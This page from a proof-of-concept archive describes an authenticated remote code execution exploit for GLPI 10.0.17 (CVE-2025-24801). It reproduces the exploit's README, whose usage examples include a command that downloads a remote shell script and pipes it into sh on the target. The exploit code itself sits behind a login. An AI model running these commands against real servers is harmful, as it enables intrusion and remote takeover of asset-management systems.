Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2025-24801 PoC — GLPI allows authenticated remote code execution

Source
https://github.com/r1beirin/Exploit-CVE-2025-24801
Associated Vulnerability
Title:GLPI allows authenticated remote code execution (CVE-2025-24801)
Description:GLPI is a free asset and IT management software package. An authenticated user can upload and force the execution of *.php files located on the GLPI server. This vulnerability is fixed in 10.0.18.
Readme
# CVE-2025-24801

This exploit uses CVE-2025-24801 to get Remote Code Execution (RCE) via Local File Inclusion (LFI) at GLPI 10.0.17. [Proof of Concept (PoC)](https://blog.lexfo.fr/glpi-sql-to-rce.html) of this CVE with explaination to this vulnerability in GLPI.

## Observation
Some applications expose the `/glpi/` endpoint (e.g., http://172.16.11.130:8080/glpi/front/computer.form.php). If the target application includes this endpoint, it is necessary to add it to the --url parameter (e.g., --url http://172.16.11.130:8080/glpi).

## Usage
Example of usage.
```bash
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password
```

If you already executed this exploit and triggered RCE, you can use `--cmd ` parameter to just execute the command.
```bash
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password --cmd "curl http://10.0.10.235/shell.sh | sh"
```
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →